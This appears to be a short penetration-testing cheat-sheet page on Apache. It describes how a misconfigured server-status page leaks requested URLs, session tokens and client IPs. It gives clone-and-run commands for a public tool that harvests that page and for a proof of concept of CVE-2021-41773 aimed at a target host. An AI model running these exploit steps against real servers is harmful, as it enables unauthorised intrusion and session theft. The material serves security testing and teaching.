π¦Apache
Server Status
Apache server-status is an Apache monitoring instance Available by default at http://$target/server-status
In normal cases, the server-status instance is not accessible by non-local IPs. However, due to misconfiguration, it can be publicly accessible. This leads anyone to view the great amount of data by server-status.
Data exposed
All URL requested by all hosts/vhosts, including obscure files/directories and session tokens
All requested client's IPs
Exploiting it
# install
git clone https://github.com/mazen160/server-status_PWN.git
cd server-status_PWN
pip3 install -r requirements
# exploit
python3 server-status_PWN.py --url 'http://$target/server-status'
CVE-2021-41773
# install
git clone https://github.com/iilegacyyii/PoC-CVE-2021-41773.git
cd PoC-CVE-2021-41773/
python3 CVE-2021-41773.py --host https://$target
Last updated
Was this helpful?